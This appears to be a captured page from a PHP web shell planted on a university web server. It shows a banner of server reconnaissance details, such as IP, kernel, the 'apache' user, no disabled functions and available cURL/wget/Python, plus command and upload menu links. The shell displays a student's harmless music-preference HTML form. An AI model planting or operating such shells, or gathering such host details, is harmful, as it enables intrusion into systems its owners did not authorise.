Server IP : 172.16.15.8 / Your IP : 3.145.62.36 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jmmowatt/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- finalInsert.php Jack Mowatt Dr. Wang CS389 --> <CENTER> <h1> Enter your music preferences! </h1> <hr> <Font size=4> <Form action=genreInsert.php method=post> User Name: <input type=text size=30 name=uname> <P> </center> Please select your favorite genre - <BR> <INPUT TYPE=radio name=genre value=1> Country<BR> <INPUT TYPE=radio name=genre value=2> Pop<BR> <INPUT TYPE=radio name=genre value=3> Reggae<BR> <INPUT TYPE=radio name=genre value=4> Alternative<BR> <INPUT TYPE=radio name=genre value=5> Rap<BR> <INPUT TYPE=radio name=genre value=6> Christian<BR> <INPUT TYPE=radio name=genre value=7> Classic Rock<BR> <INPUT TYPE=radio name=genre value=8> Oldies<BR> <P> <HR> <input type=submit value=Submit> <input type=reset value=Reset> <P> <HR> <CENTER> <A HREF=finalProj.html>Home </A> | <A HREF=finalDisplay.php> View Table</A> </CENTER> </Form>